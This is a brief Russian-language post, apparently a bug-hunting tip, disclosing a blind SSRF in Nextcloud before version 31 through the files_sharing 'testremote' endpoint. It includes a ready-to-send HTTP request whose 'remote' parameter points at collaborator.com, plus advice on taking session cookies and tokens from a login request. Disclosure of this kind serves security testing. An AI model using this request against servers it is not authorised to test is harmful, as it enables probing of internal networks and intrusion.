Как-то недавно я обнаружил эту страничку и решил глянуть, что это за функциональность в коде Nextcloud. И оказалось, что в Nextcloud до 31 версии любой внешний пользователь может эксплуатировать Blind SSRF:
GET /index.php/apps/files_sharing/testremote?remote=collaborator.com HTTP/2
Host: example.com
Cookie: ...
Requesttoken: <token>
Ocs-Apirequest: true
Нужные куки и другие данные можно взять с запроса с попыткой входа в УЗ.
Так что, багхантеры и пентестеры, вперёд:D